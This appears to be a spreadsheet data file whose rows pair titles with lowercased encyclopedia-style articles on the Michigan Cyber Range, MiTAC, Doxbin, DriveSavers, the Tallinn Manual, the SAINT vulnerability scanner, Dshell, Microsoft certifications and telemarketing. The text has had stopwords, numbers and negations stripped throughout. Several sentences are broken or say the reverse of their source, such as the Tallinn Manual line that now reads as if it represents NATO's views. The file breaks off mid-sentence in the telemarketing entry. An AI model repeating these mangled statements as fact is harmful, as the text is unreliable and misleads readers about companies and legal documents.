cybersecurity. total students participated retraining program. veterans selected based experience aptitude, conjunction wayne county’s veterans affairs office. during 2016, michigan cyber range added publicly-accessible hubs southeast michigan. each location provides certification courses, cybersecurity training exercises product hardening/testing direct connection michigan cyber range. cyber range hubs opened inside velocity center macomb-oakland university sterling heights march pinckney community high school december wayne state university warren. during fall 2016, merit network michigan governor rick snyder launched governor's high school cyber challenge, competition high school students test skills computer science, information technology, cybersecurity. final round challenge happened north american international cyber summit, hosted governor snyder october 2016. three-person team clinton high school crowned champions competition defeating teams inaugural event. michigan cyber range provided challenges infrastructure annual cyber competition. michigan cyber range twice named north american authorized training center (atc) year mile2. 2017, michigan cyber range doubled participation governor’s high school cyber challenge high school students 584. this included successful elicitation participation native american tribal areas michigan. another milestone addition cyber range hubs florida georgia. continuing commitment since 2015, michigan cyber range provides exercises, support, infrastructure cyber challenge, national cyber competition sponsored department homeland security. other milestones include creation virtual environments facilitate cybersecurity involvement kinetic training exercises, creation international cyber exercise (ice) promote collaboration partnership states’ national guard units countries participating state partnership program (spp), successful launch regional cybersecurity education collaboration partnership state michigan cisco. event 2017 naics states countries participated. october 2018, michigan cyber range held student exercise michigan governor's summit. this exercises held 2018. additionally 2018 another cyber range added, wmcat grand rapids. 2019, another cyber range opened northern michigan university marquette.an event known high school cyber challenge 2019, featuring grand total teams. 2020, michigan cyber range held exercise merit member conference guests showcasing capabilities alphaville. 2021, michigan cyber range held international cyber exercise state wide capture flag. international cyber exercise involved teams world. these teams competed control alphaville paintball exercise. also michigan portal references also michigan portal external links michigan cyber range merit network, inc.</t>
  </si>
  <si>
    <t>MiTAC</t>
  </si>
  <si>
    <t>mitac holdings corporation, formerly mitac international corp. (chinese: 神達電腦股份有限公司) taiwanese electronics company established december 1982. subsidiary mitac-synnex group. through 100% stock swap mitac international corp., mitac holdings corp (神達投資控股) (twse: 3706) established september 2013, listed traded taiwan stock exchange code 3706.mitac's business cloud computing business group, valued nt$3.4 billion (including assets, liabilities, related valuation items shareholders' equity, operations), spun offered mitac computing technology corporation. mitac computing technology issued shares consideration mitac holdings. transaction closing date spinoff september 2014.according corporate president billy mitac withdrew industry 2010 turned focus developing internet things (iot) systems. this transformation resulted organization changed afterwards.on february 2007, mitac signed definitive agreement portable navigation device (pnd) operations navman brand brunswick corporation.mitac merged tyan computer march 2007 server business. therefore, mitac business top-five server brands, also tyan focusing value-added reseller system integration market. products infotainment systems automotive oems, automotive navigation systems, drive video recorders, dashcams, connected solutions, outdoor navigators, smart watches, wearable computers. history mitac founded hsinchu science park december 1982. 1985 mitac promoted independent computer brand. adopt technology 1989, developed world's fastest 80386-based personal computer 286, 386, 486-based products. officially listed taiwan stock exchange 1990 2013 (twse: 2315). from september 2013 mitac holdings corporation established listed traded taiwan stock exchange stock code 3706. 1990, established mitac technology (now called getac) strategic alliance specialize national defense industrial notebook pcs. 1992, quickened pace internationalization, expanding production facilities order meet demand european market. listed level-a vendor environmental protection assessment taiwan's largest manufacturers environmental protection agency. 1993 mitac acquired american subsidiary compac (now synnex corporation), thereby increasing mitac international's competitiveness market, established subsidiaries mexico zealand. mitac shunde china officially commenced operations. mitac international signed formal agreement compaq 1995 establish strategic alliance. mitac international's subsidiary synnex successfully acquired well-known american distribution channel vendor computer-land 1997.announced 1999 taking stake well-known american computer motherboard design house tyan, thereby entering market high-end motherboards. 2000 established mitac computer (shanghai) ltd., mitac computer (kunshan) ltd., shanghai mitac research ltd. expand production respond strategic deployments. 2001 mitac international's subsidiary synnex completed acquisition shares merisel canada, inc. 2002 mitac international group celebrated 20th anniversary establishing business operations headquarters taiwan. they bought tyan computer, specialist design high motherboards jointly established y.s. educational foundation member companies mitac-synnex group. established consumer brand digiwalker announced first ultra-slim products. 2003 synnex corporation mitac group listed york stock exchange (nyse: snx). mio, mitac independent brand, announced world’s first dual-band, dual-card smartphone; world’s first built-in gps: 168. 2004 commonwealth publishing co., ltd. published "the 98/2 mitac vitamin plan", golden book award smea taiwan ministry economic affairs. announced first portable navigation product built-in e-travel book. shipping volume navigation products commanded world’s third-largest. 2005 mitac incorporated technology korea. 2005 mitac ranked 67th world high-tech enterprises business week, dropped 71st 2006. 2007 mitac acquired navman trademark brunswick corporation, related operating assets liabilities (excluding cash) equipment navman europe ltd., naviart ltd., naviart information technology (shanghai) ltd. incorporated navman technology australia ltd. sydney, australia navman technology ltd. auckland, zealand. they also acquired tyan computer corporation. three handheld mobile navigation devices 2007 (according canalys idc). mitac's high-level server products passed intel qualified server board (iqsb) certification. 2008 signed exclusive global positioning equipment senior sponsor world expo 2010. purchased magellan navigation consumer satellite navigator subsidiary make magellan satellite navigator brands mitac. 2009 established subsidiary mitac digital corporation expand handheld business north america. invested loyalty founder enterprise enhance vertical integration capacity. 2010 purchased system integration assembly businesses synnex corporation. magellan launched first outdoor equipped treasure finding games. mitac servers storage devices used world expo 2010 shanghai china. first manufacturer pass iso/iec 20000 service process certification. completed world’s first (personal navigation device product category rule). 2011 mitac nt$70 million (us$2.22 million) contract build prototype “radar vehicle field operation defense” national chung-shan institute science technology. 2015 police taoyuan took custody three workers manager mitac charges forgery data fabrication test results. tender required vehicle able advance km/h degree incline, vehicle mitac delivered could advance km/h. three ncsist staff detained suspicion colluding mitac employees fabricate test results, staff presented fabricated results superiors approval. taoyuan district prosecutors’ office began investigating receiving tip.in 2012 mitac unveiled first processor-based servers launched cyclo series cycling fitness user. 2013, 100% stock swap mitac international corp., mitac holdings corporation established september listed traded taiwan stock exchange stock code 3706. time, mitac international corp. delisted. 2014, mitac international corp spun cloud computing business group mitac computing technology corp. (mct) formally established operated september also list companies taiwan references external links official website taiwan website english)</t>
  </si>
  <si>
    <t>Doxbin</t>
  </si>
  <si>
    <t>doxbin pastebin primarily used people posting personal data person interest. this referred doxing. hidden service network.due illegal nature much information published (such social security numbers, bank routing information, credit card information, plain-text), many sites seized operation onymous, multinational police initiative, november 2014. history doxbin established secure, anonymous venue publication dox, first established individual known nachash. term internet culture refers personally identifiable information individuals, including social security numbers, street addresses, usernames, emails, passwords, obtained variety legal illegal means.in november 2012, doxbin's twitter handle @doxbin attributed attack symantec, coordinated anonymous' operation vendetta.it first attracted attention march 2014 then-owner hijacked popular hidden service, hidden wiki, pointing visitors doxbin instead response maintenance pages dedicated child pornography links. june 2014, twitter account suspended, prompting site start listing personal information twitter founders ceo. october 2014, doxbin hosted personal information katherine forrest, federal judge responsible court rulings owner tor-based black market silk road, leading death threats harassment.doxbin several hidden services seized november 2014 part multinational police initiative operation onymous. shortly thereafter, site's operators avoided arrest shared site's logs information compromised developers email list, suggesting could either result specialized distributed denial service attack (ddos) exploited mistakes code. however, site could still restored easily setting domain. also cyberstalking legislation internet privacy privacy references</t>
  </si>
  <si>
    <t>DriveSavers</t>
  </si>
  <si>
    <t>drivesavers, inc. computer hardware data recovery, digital forensics electronic discovery firm located novato, california. founded hagan former company president scott gaidano 1985. history 1985, former jasmine technologies executives hagan scott gaidano founded drivesavers, operating gaidano’s condo $1,400. drivesavers originally offered hard drive repair data recovery services, company dropped drive repair services within first eight months. 1992, drivesavers signed agreement supermac technology assume technical support warranty obligations supermac mass storage products.the company merged data recovery disk repair 1994 retained drivesavers name. 2008, drivesavers invested million dollars build series five iso-certified cleanrooms disassemble rebuild damaged hard drives. from 2004-2009, company grew employees.drivesavers also works "the secretive" branches government celebrities. order provide comfort assistance clients data loss situation, drivesavers staff individual "data crisis counselor." this counselor experience working suicide hotline. drivesavers recovery firm licensed every major hard-drive manufacturer, work drive void warranty. recover data hard disk drives, solid state drives, smart phones, servers, digital camera media devices. company recover data m1-powered macs embedded storage. even cloud backup, personal data loss still possible, recovered. company recovered data floppy disks deceased creator star trek, gene roddenberry, potentially containing lost episodes franchise.drivesavers certified hipaa-compliant, undergoes annual soc2 type reviews encryption training certificates guardianedge, pgp, pointsec utimaco. security certifications practices drivesavers facility made cleanrooms. cleanrooms come different ratings depending application range federal standards 100,000 100. rating measure number 0.1-micron-sized airborne particulates square meter. drivesavers employees background checks, contracts state, federal government agencies. company also meet data-security standards clients like hipaa certification work hospitals glba certification work financial institutions. awards diamond certified, since 2013– cert 2035storage visions, visionary company award, 2014flash memory summit, most innovative flash memory consumer application award, 2018better business bureau, rating also list data recovery companies references external links official site</t>
  </si>
  <si>
    <t>MiTAC Computing Technology Corp.</t>
  </si>
  <si>
    <t>mitac holdings corporation, stock swap mitac international corp., established september 2013. meantime, mitac group also implementing restructuring meet future operational direction group. after, group separated original mitac cloud computing business group establish independent mitac computing technology corporation (神雲科技) september 2014. mitac computing technology corporation's core cloud database computing equipment. with twenty years industry experience tyan brand, mitac designs manufactures servers based intel x86, sparc, power isa, processors.in january 2015, avnet embedded, division avnet electronics marketing americas, signed distribution agreement mitac computing technology corp., designer manufacturer cloud database computing equipment. history 2014: mitac international corp span cloud computing business group mitac computing technology corp. (mct). latter formally operated september 1.won 2013 supplier award fujitsu.2015: tyan announced first server- tn71-bp012, power architecture followed openpower foundation's design concept. products rack mount server, tower server hpc, storage system, blade server, computing, cloud computing server panel all-in-one embedded board, embedded solutions references</t>
  </si>
  <si>
    <t>S.H. Couch</t>
  </si>
  <si>
    <t>summary firm couch, often known simply couch, quincy, massachusetts, manufacturing company founded circa 1901 boston dissolution whitman couch, partnership, second entity known couch seeley. couch launched participated turn century independent telephone movement ensued expiration foundational bell telephone patents 1894. company specialized electrical devices including telephones, intercoms, fire alarm systems. couch offices boston chicago 1907. couch re-organized became subsidiary couch associates time 1926 1941. couch associates apparently financial holding company served founder, spouse, adopted brother william couch. according undated letter written samuel couch, assets original couch company consisted plant, machinery, inventories, cash banks hand, accounts notes receivables, securities stocks bonds companies. couch noted plant, machinery tools, patents, inventories sold couch company $240,000.00. three individuals, atkinson, cameron morrison, attached company, issue $210,000.00 preferred stock $30,000.00 common stock back couch associates, inc. remaining assets couch retained couch associates. according couch's estate filings, held preferred common stock shares couch associates death 1954.information file united states patent trademark office sketches quick history couch company. those records indicate trademark "couch" first used november 1903, registered 1948. 1969, trademark transferred corporation philadelphia, pennsylvania. another transfer trademark, relocated couch, michigan, took place 1978. trademark associated transfers viewed here. couch well known fire alarm control units including fabc-series advanced fire-voice high rise detection evacuation signaling system, apartment building intercom/telephone systems, nurse call intercom systems. later history couch considered light developments across american fire alarm signal industry generally, modernization efforts boston area particular. quick overview industry available several sources including national fire protection association's guide fire alarm signaling system installation. section pocket guide notes first public fire alarm reporting system world, boston fire alarm telegraph, went service april 1852. guide also highlights transitions affected fire alarm industry smoke detectors beginning 1960, visible signaling 1980s, adoption microprocessor software technology. detailed look evolution boston's public fire alarm system, 1859 1973, seen courtesy boston sparks association. eventually, fire alarm industry consolidation phase took place.couch closed 1985. advanced signal corp., randolph, massachusetts, purchased remaining inventory continued support line products 2003.based advertising sources, related corporate entity known couch ordnance, inc., located arlington street, north quincy, 1958. 1959, couch ordnance purchased story basement building river street, dorchester, 1965 trade publication focused leading american ultraminiature electronic component parts manufacturers cited couch ordnance products annual review. couch ordnance advertising 1966 indicated subsidiary couch.s.h. couch held commercial government entity (cage) code number 05587 issued defense logistics agency october, 1974. cage code active firm michigan. earlier, division esb, couch held cage code number 14740. company facilities launch 1901, couch based sumner street, boston, based later couch company advertising, firm offices pearl street, boston, 1905. 1915, boston office purchase street.the firm's home office manufacturing plant moved quincy 1910. probably located arlington street, corner arlington squantum streets, norfolk downs, quincy, photograph couch company building quincy, circa 1870-1930, available thomas crane public library.the couch office chicago, illinois, opened 1907 direction peter hensel. originally located dearborn street. that couch office later moved west madison street 1913 least 1917. leaders samuel henry couch, milton, 1872, 1954) founder firm. early article notes president treasurer firm incorporated circa 1904. state illinois foreign corporation registration records 1913 another source describe firm's president. cited 1915 patent assigned company. finally, norfolk county, registry deeds records series real estate transactions couch eponymously named firm, spouse, others.mr. couch born kingsteignton, united kingdom, emigrated united states youth family. photograph couch, dated circa 1899, available here. caption photograph identifies couch leaders independent telephone movement. couch contributed movement early 1897 represented eastern region national association's founding meeting took place detroit june year. 1921, couch also director quincy trust company, position retained 1953.mr. benjamin fredey jaques 1905, 2001) also served president couch couch ordnance firm still based october 1952, jaques concurrently held following positions: president jaques company, batterymarch street; president director couch company; president director couch ordnance; board member england trust. industry consolidation from 1969, couch associated exide safety systems, randolph, massachusetts. publications issued 1973 1974 describe couch division esb. brands incorporated, associated electric storage battery company, latter predecessor exide, created 1964 domestic corporation pennsylvania entity number 101773, according state's business records. dissolved consolidation 1980. while controlled corporation, relay manufacturing portion couch, based boston, sold deutsch relays east northport, 1975. remaining couch elements consolidate esb's exide safety systems division plant randolph, 1977, exide safety systems, division inc., included branches: exide lightguard exide couch, according source. couch sold later year. photographs exide-couch co-branded manual fire alarm pull stations exist.faraday's parent corporation purchased couch 1977 closed quincy, massachusetts facility moving factory engineering group patterson street, tecumseh, michigan. business licensing records held state michigan note couch company registered foreign profit corporation (also known foreign corporation) august 1978. according state michigan, firm filed annual reports 1982. registration state cancelled 1984. state ohio business records period indicate couch legally domiciled state july 1978. products early couch products included 1898 (sic) intercom, 1908 (intercommunicating branch exchange), 1910 inter-phone, design concepts.an additional patent filing 1931 shows evolution "private" telephone systems apartment houses, businesses, offices.the firm published booklet 1936 titled "electric reset annunciators, signaling systems accessories."photographs videos s.h. couch alarm products circa 1960 available fire panel forums, elsewhere.the february, 1969, issue popular mechanics describes fire alarm systems includes s.h. couch list manufacturers.by 1970, united states code federal regulations noted s.h. couch manufactured mailboxes appropriate apartment buildings. some couch patents references</t>
  </si>
  <si>
    <t>S21Sec</t>
  </si>
  <si>
    <t>s21sec founded first iberian cybersecurity company 2000. during years, cybercrime evolved breathtaking pace organised, sophisticated, criminal front affects individuals organizations globally. late 2014, portugal-based sonae bought s21sec. 2008 s21sec created ecrime counter threat intelligence department. sonae acquired nextel s.a. 2018 merged s21sec, creating biggest iberian company cybersecurity services. company offers complete breed services needed alongside digital transformation processes reshaping businesses, adapting evolving service portfolio cover complete nist framework (national institute standards technology united states) globally used reference enterprises manage cybersecurity. therefore, s21sec covers phases identification, protection, detection, response, recover. also references external links official website</t>
  </si>
  <si>
    <t>Metech Incorporated</t>
  </si>
  <si>
    <t>metech recycling, inc. business since 1968 headquartered gilroy, california. company founded recycle precious metal scrap electronic equipment manufacturers. over time, evolved recycle electronic components manufacturing by-products. over years, end-of-life electronic equipment, brand, proprietary design, hipaa government compliance protection, secure data destruction asset management become core focus business landscape continues change.. company places emphasis environmentally responsible recycling. history metech history timeline1875 wildberg brothers facility, (aka boliden metech) metal reclamation plant operated francisco 1907 1986. site approximately acres size. this facility used antimony smelting plant operated unknown duration beginning 1875. 1907 site purchased 1907 wildberg brothers company operated metal reclamation facility. operations included milling, sampling, assaying scrap materials, electrolytic deposition silver, stripping gold, copper concentration. gold, platinum, palladium, silver copper recovered finished products. 1968 traces origin back 1968 woonsocket, r.i. time, refinemet focused precious metals tantalum recovery. refinemet expanded electronics recycling “default” late ’70s early ’80s customers like at&amp;t, burroughs, large pieces equipment retiring. 1980 wildberg brothers sold facility refinemet international (rmi) 1980. primarily used facility precious metal scrap processing refining. 1983 1983, shortly expanding processing end-of-life electronics, boliden, smelting mining company based stockholm, sweden, purchased renamed boliden metech. time metech moved east coast operation woonsocket, mapleville, boliden used francisco facility primarily precious metal scrap processing engage refining operations site. operations conducted onsite consisted material sorting, sampling, assaying materials containerized shipment boliden facilities overseas processing. 1986 boliden discontinued operations francisco site 1986. buildings site, exception building office building, building laboratory; buildings 11-12, melt shop, mechanical processing area, demolished business moved current location gilroy, trelleborg, (the parent company boliden), later spun smelting operations name boliden retained metech recycling processing operation. 2002 viking investment asset management, based johannesburg, south africa, bought metech. 2005 2005 metech acquired corp relocated corporate offices mapleville, worcester, mass. company designed processing line include shredders downstream separation equipment. time, metech also discontinued receiving precious-metals-containing hazardous waste scaled back local precious metals refining businesses adding value company’s focus integrated electronics recycling. 2007 2007 metech acquired “centillion environment recycling ltd” singapore. 2008 centillion purchases “guaranteed recycling xperts” (grx) locations denver, salt lake city, omaha, 2009 2009 centillion merges metech metech recycling banner. 2012 centillion renamed metech international 2016 2016 worcester facility relocated current location nearby clinton, time, corporate operations permanently transferred gilroy, facility. 2018 2018 metech recycling purchased metech international first america management group taken private. 2021 metech creedmoor location relocates roxboro, metech continues operate strong national footprint serving industries across united states industries medical, military, government, education, manufacturing many more. also asset management data security data erasure computer recycling electronic waste electronic devices references further reading grossman, elizabeth (2006). high tech trash- digital devices, hidden toxics, human health. island press. isbn 1-55963-554-1. external links metech recycling, inc.:home audit: government could e-waste arena; utah steps http://yosemite.epa.gov/opa/admpress.nsf/0/54fcf812f3cb2972852579260068d977?opendocument</t>
  </si>
  <si>
    <t>Tallinn Manual</t>
  </si>
  <si>
    <t>tallinn manual (originally entitled, tallinn manual international applicable cyber warfare) academic, non-binding study international particular bellum international humanitarian law) applies cyber conflicts cyber warfare. between 2009 2012, tallinn manual written invitation tallinn-based nato cooperative cyber defence centre excellence international group approximately twenty experts. april 2013, manual published cambridge university press. late 2009, cooperative cyber defence centre excellence convened international group legal scholars practitioners draft manual addressing issue interpret international context cyber operations cyber warfare. such, first effort analyse topic comprehensively authoritatively bring degree clarity associated complex legal issues. process authors collectively calling international group experts, authors tallinn manual include highly respected legal scholars legal practitioners experience cyber issues consulted throughout duration project information technology specialists. group professor michael schmitt, chairman international department united states naval college, also served project director. other members group included professor wolff heintschel heinegg viadrina european university, commodore (ret.) william boothby united kingdom royal force, professor thomas wingfield george marshall european center security studies, bruno demeyere formerly catholic university leuven, professor eric talbot jensen brigham young university, professor sean watts creighton university, louise arimatsu chatham house, captain (navy) geneviève bernatchez office judge advocate general canadian forces, colonel penny cumming australian defence force, professor robin geiss university potsdam, professor terry gill university amsterdam, netherlands defence academy, utrecht university, professor derek jinks university texas, professor jann kleffner swedish national defence college, nils melzer geneva centre security policy, brigadier general (ret.) kenneth watkin canadian forces. technical advisors professor james bret michael united states naval postgraduate school well kenneth geers rain ottis, previously associated nato cooperative cyber defence centre excellence. three organisations represented observers throughout drafting process: nato allied command transformation relationship nato cooperative cyber defence centre excellence nato, international committee cross “guardian” role international humanitarian law, united states cyber command ability provide perspective operationally mature entity. academic credibility tallinn manual, prior publication peer-reviewed thirteen international legal scholars.when draft tallinn manual posted site nato cooperative cyber defence centre excellence, immediately drew attention legal community well online media outlets reporting mainly technology questions. furthermore, official publication march 2013 chatham house, issue international governs cyber warfare discussed widely among international media references manual.although frequently referred nato manual, incorrect. tallinn manual independent academic research product representing views authors personal capacity. manual represent views nato organisation state, including represented observers. being first authoritative restatement application interpretation international cyber context, however, anticipated manual effect states organisations formulate approaches positions matters. format practice producing non-binding manuals application international humanitarian new. tallinn manual followed footsteps similar efforts, international institute humanitarian law’s remo manual international applicable armed conflicts harvard program humanitarian policy conflict research’s manual international applicable missile warfare. manual divided sections referred “black letter rules” accompanying commentary. essentially, rules restatements international cyber context, understood agreed authors. since adoption rule required consensus among authors (not including observers) commentary attached rule serves critical purpose outlining differences opinion precise application rule. commentary also identifies legal basis rules, explains normative content, addresses practical implications cyber context. tallinn tallinn 2.0, followed original manual, designed expand scope tallinn manual. tallinn released february 2017 published cambridge university press form book.the focus original tallinn manual disruptive destructive cyber operations—those qualify ‘armed attacks’ therefore allowing states respond self-defense—and taking place armed conflict. since threat cyber operations consequences especially alarming states, academic research focused issues. tallinn refers cyber "operations" opposed cyber "conflict" original tallinn manual.states challenged daily, however, malevolent cyber operations rise aforementioned level. tallinn project examines international legal framework applies cyber operations. relevant legal regimes include state responsibility, sea, international telecommunications law, space law, diplomatic consular law, and, respect individuals, human rights law. tallinn also explores general principles international law, sovereignty, jurisdiction, diligence, prohibition intervention, apply cyber context. senior fellow centre, professor michael schmitt united states naval college university exeter, directed tallinn project. liis vihul centre served project manager. team legal experts centre supported effort. similarly predecessor, expanded edition tallinn manual represented views international group experts, nato, nato coe, sponsoring nations, state organization. references external links http://www.nowandfutures.com/large/tallinn-manual-on-the-international-law-applicable-to-cyber-warfare-draft-.pdf tallinn manual process page nato cooperative cyber defence centre excellence</t>
  </si>
  <si>
    <t>Metadirectory</t>
  </si>
  <si>
    <t>metadirectory system provides flow data directory services databases, order maintain synchronization data, important part identity management systems. data synchronized typically collections entries contain user profiles possibly authentication policy information. most metadirectory deployments synchronize data least ldap-based directory server, ensure ldap-based applications single sign-on portal servers access recent data, even data mastered non-ldap data source. metadirectory products support filtering transformation data transit. most identity management suites commercial vendors include metadirectory product, user provisioning product. also virtual directory identity correlation microsoft identity integration server netiq identity manager critical path metadirectory</t>
  </si>
  <si>
    <t>SAINT (software)</t>
  </si>
  <si>
    <t>saint (security administrator’s integrated network tool) computer software used scanning computer networks security vulnerabilities, exploiting found vulnerabilities. saint network vulnerability scanner saint scanner screens every live system network services. service finds running, launches probes designed detect anything could allow attacker gain unauthorized access, create denial-of-service, gain sensitive information network.saint provides support security content automation protocol (scap) specification unauthenticated vulnerability scanner authenticated vulnerability patch scanner. saint also approved scanning vendor payment card industry (pci).the four steps saint scan: step saint screens every live system network services. step service finds running, launches probes designed detect anything could allow attacker gain unauthorized access, create denial-of-service, gain sensitive information network. step scanner checks vulnerabilities. step when vulnerabilities detected, results categorized several ways, allowing customers target data find useful.saint group vulnerabilities according severity, type, count. also provide information particular host group hosts. saint describes vulnerabilities locates; references common vulnerabilities exposures (cve), cert advisories, iava (information assurance vulnerability alerts); describes ways correct vulnerabilities. many cases, saint scanner provides links patches software versions eliminate detected vulnerabilities.a vulnerability flaw system, device, application that, leveraged attacker, could impact security system. exploits take advantage vulnerability compromising destructing vulnerable system, device, application. remediation process repairing providing remedy vulnerability, thereby eliminating risk exploited. vulnerability scanning used identify evaluate security posture network. historically, scanners developed specific purposes scanning windows desktops, applications, network devices. saint offers heterogeneous scanning identifies vulnerabilities across operating systems, desktop applications, network devices, applications, databases, more. saintexploit penetration testing tool integrated penetration testing tool, saintexploit, demonstrates path attacker could breach network quantifies risk network. saintexploit includes site emulator e-mail forgery tool.penetration testing tools saint designed simulate internal external real-world attacks. this type testing identifies methods gaining access target understanding techniques used attackers. there many levels types penetration testing scope project well defined. targets included scope could include popular protocols, network devices, databases, applications, desktop applications, various flavors operating systems. saint focuses development exploits shell established. shell, shellcode, exploits included offer command shell/direct connection target computer performing testing. exploits target operating systems, desktop applications, databases, applications, protocols, network devices. common exploit types included saintexploit include following: remote exploit these attacks launched across internet network vulnerable target without user previous access system. client exploit victim must access attacker’s resource successful attack take place. common client exploits include e-mail forgery attacks, enticing user visit site, open file. local exploit order launch local attack, attacker must previous access victim. (also known privilege elevation tunneling). case, victim's machine used launch connecting vulnerable targets. saintmanager remote management console saint’s remote management console, saintmanager, enables enterprise-wide vulnerability scanning. browser-based console provides ability centrally manage entire network saint vulnerability scanners single interface. saintcloud saintcloud enables cloud based vulnerability scanning, penetration testing, compliance audits without download install software. history saint (security administrator's integrated network tool) network vulnerability scanner based satan (security administrator tool analyzing networks) developed farmer wietse venema released 1995. saint corporation (formerly world wide digital security, inc. (wwdsi)) continued development released saint july 1998. wwdsi changed name saint corporation january 2002. saint products developed saint corporation, headquartered bethesda, maryland. references external links saint home page</t>
  </si>
  <si>
    <t>MiTAC Holdings</t>
  </si>
  <si>
    <t>mitac holdings corporation, subsidiaries (mitac international corp. mitac computing technology), provides navigation devices, automotive solution, cloud services cloud computing products worldwide. company offers range electronics manufacturing services, research development, design, manufacturing, assembly, marketing, solutions. also distributes portable navigation products, outdoor handheld navigation devices, mobile solutions; dashcam vehicles, portable navigation devices 4wd, trucks magellan, mio, navman brand names. addition, company designs, manufactures, markets server/workstation platforms oems, vars, system integrators, resellers tyan brand name. further, offers storage products, cloud computing applications, all-in-one thin client, system, well smart wearable device professional tablet series. mitac holdings corporation based taipei, taiwan. history 2013: through 100% stock swap mitac international corp., mitac holdings corporation established september listed traded taiwan stock exchange stock code 3706. 2014: mitac international corp span cloud computing business group mitac computing technology corp.(mct) formally operated september subsidiaries asia: mitac international corp. office, mitac international corp. nangang office, mitac international corp. hsin-chu factory, mitac computing technology corporation, mitac computer (kunshan) co., ltd., mitac computer (shunde) ltd., mitac research (shanghai) ltd., mitac japan corp., mitac service (shanghai) co., usa: mitac digital corporation, mitac information systems corp. tyan computer corporation europe: mitac benelux n.v. mitac europe ltd. representative office mitac europe ltd. moscow, russian federation, mitac europe ltd. o.o. oddzial polsce oceania:mitac australia ltd., navman technology ltd. investments us:synnex references</t>
  </si>
  <si>
    <t>Dshell</t>
  </si>
  <si>
    <t>dshell open source, python-based, forensic analysis framework developed u.s. army research laboratory, this tool provides users ability develop custom analysis modules helps understand events cyber intrusion. this framework handles stream reassembly ipv4 ipv6 network traffic also includes geolocation ip-to-asn mapping connection. additionally, framework plug-ins designed understanding network traffic present results user concise, useful manner. since dshell written entirely python, code base customized particular problems modifying existing decoder extract different information existing protocols.the u.s. army research laboratory (arl) released version dshell github social coding website december 2014, downloads 2,000 unique visitors countries. before publicly released, dshell small, select community users several government organizations. users could tool find exact information needed network data including looking names, reassembled website requests decoded malware traffic. chose release dshell github sharing world created security teams gaining another specialized tool keep networks secure. furthermore, increasing security internet whole increasing number skilled eyes looking bugs potential improvements throughout code.in 2014, nasa released 1,000 dshell. other agencies, national security agency, national guard force research laboratory joined shortly following year.github chosen dshell allows members easily download software code, store edits, provide mechanism offer feedback original designer. additionally, rolling enhancements official version make easier share software across organizations, bypassing constant emailing sending cds. june 2016, users created 11,000 copies tool offered approximately suggested modifications original software.there additional modules within dshell framework accessed increase network security; however, ability rapidly develop share analytical modules core strength framework. references</t>
  </si>
  <si>
    <t>Microsoft Certified Application Specialist: Microsoft Office Word 2007</t>
  </si>
  <si>
    <t>microsoft certified application specialist: microsoft office word 2007 certification microsoft certified applications specialist (mcas) series microsoft certifications. 77-601 microsoft exam leads certification microsoft word 2007. test minutes length features questions using live demonstration, multiple choice, order question. external links http://www.microsoft.com/learning/en/us/exam.aspx?id=77-601&amp;locale=en-us</t>
  </si>
  <si>
    <t>Microsoft Certified Professional</t>
  </si>
  <si>
    <t>microsoft certified professional certification program microsoft. microsoft overview microsoft certifications earned passing exams aligned specific certification. process earning certification changed multiple times since inception. current iteration introduced february 2020, microsoft announced retiring existing microsoft certified professional (mcp), microsoft certified solutions developer (mcsd), microsoft certified solutions expert (mcse) microsoft certified solutions associate (mcsa) certifications, introducing pathways, changing individuals earn maintain microsoft certifications. under process, number selection exams required achieve microsoft certification varies.these certifications planned phased effective june 2020 favor "role-based" certifications focused primarily azure microsoft 365. however, march 2020, microsoft announced remaining exams associated mcsa, mcse mcsd retire january 2021.historically, mcse mcsd credentials required individual recertify period three years order keep credential "active section" transcript. under system, mcse mcsd credentials longer recertification requirement, remain "active transcript" holder, gained. individuals instead re-earn certification every year passing additional elective exam. done reflect increasing cadence updates microsoft products services, products like microsoft azure adding features every hours. certifications current list certifications are: fundamentals microsoft technology associate (mta) microsoft certified educator (mce) microsoft office specialist (mos) role-based: microsoft azure microsoft dynamics microsoft power platform microsoft teams specialty: windows virtual desktop specialty azure developer specialty azure workloads specialty also microsoft technology associate references</t>
  </si>
  <si>
    <t>Telemarketing</t>
  </si>
  <si>
    <t>telemarketing (sometimes known inside sales, telesales ireland) method direct marketing salesperson solicits prospective customers products services, either phone subsequent face face conferencing appointment scheduled call. telemarketing also include recorded sales pitches programmed played phone automatic dialing. telemarketing defined contacting, qualifying, canvassing prospective customers using telecommunications devices telephone, fax, internet. include direct mail marketing. history term telemarketing first used extensively late 1970s describe bell system communications related uses outbound wats inbound toll-free services. telephonists rise telemarketing traced back 19th century telephonists, switchboard operators. trans-cultural hiring switchboard operators (mostly women) became especially popular north america throughout 20th century, partially popularity gained advertising.: 183–184 after shift public switched telephone network computer-based electronic switching system, switchboard operators gradually diminished. however, rise advertising popularity telephone use, jobs, including telemarketing jobs, created. women telemarketing telemarketing, case telephone operators, fields known occupied mostly women. central reason hiring women operators fact women's work considered form cheap labor: female telemarketers earned one-half one-quarter men's wages.: women also considered polite well mannered male operators.: moreover, calming, delicate nature woman's voice considered women's natural quality, although scientific evidence supports statement. this naturalization normalizing perception women telephone operators consultants, currently reflected telemarketing industry. categories major categories telemarketing business-to-business business-to-consumer. subcategories lead generation, gathering information contacts. sales, using persuasion sell product service. outbound, proactive marketing prospective preexisting customers contacted directly, inbound, reception incoming orders requests information. demand generally created advertising, publicity, efforts outside salespeople. service styles call action, implementation outbound telemarketing "activate" elicit action response prospects (i.e., entice prospects visit client's website). appointment setting, utilizing inbound outbound telemarketing create face-to-face telephone appointments sales purposes. database cleansing, outbound calling databases particular purpose clean prepare data (i.e. removing outdated incorrect data) contact details future telemarketing campaigns. surveys, implementation telemarketing (can inbound outbound) particular purpose collecting data information specific target markets qualitative research purposes. telesales, telemarketing (inbound outbound) specific intention making actual sale/transaction phone. often includes collection credit card details phone payment purposes, allows faster sales cycles payment confirmation. procedure telemarketing done company office, call center, home. involve live operator voice broadcasting frequently associated political messages. effective telemarketing campaign often involves calls. first call series calls) determines customer's needs. final call series calls) motivates customer make purchase. prospective customers identified various means, including past purchase history, previous requests information, credit limit, competition entry forms, application forms. names also purchased another company's consumer database obtained telephone directory another public list. qualification process intended determine customers likely purchase product service. business-to-business lead generation scenarios, telemarketing often targets perceived decision-makers might good prospects business product service. telemarketing approach often combined outreach email social media, typically referred cadence. calls usually made sales development representatives goal outreach subsequent meeting—often account executive vendor organization. charitable organizations, alumni associations, political parties often telemarketing solicit donations. marketing research companies telemarketing techniques survey prospective past customers client's business order assess market acceptance satisfaction particular product, service, brand, company. public opinion polls conducted similar manner. telemarketing techniques also applied forms electronic marketing using e-mail messages, case frequently considered spam receivers. negative perceptions criticism telemarketing negatively associated various scams frauds, pyramid schemes, deceptively overpriced products services. fraudulent telemarketing 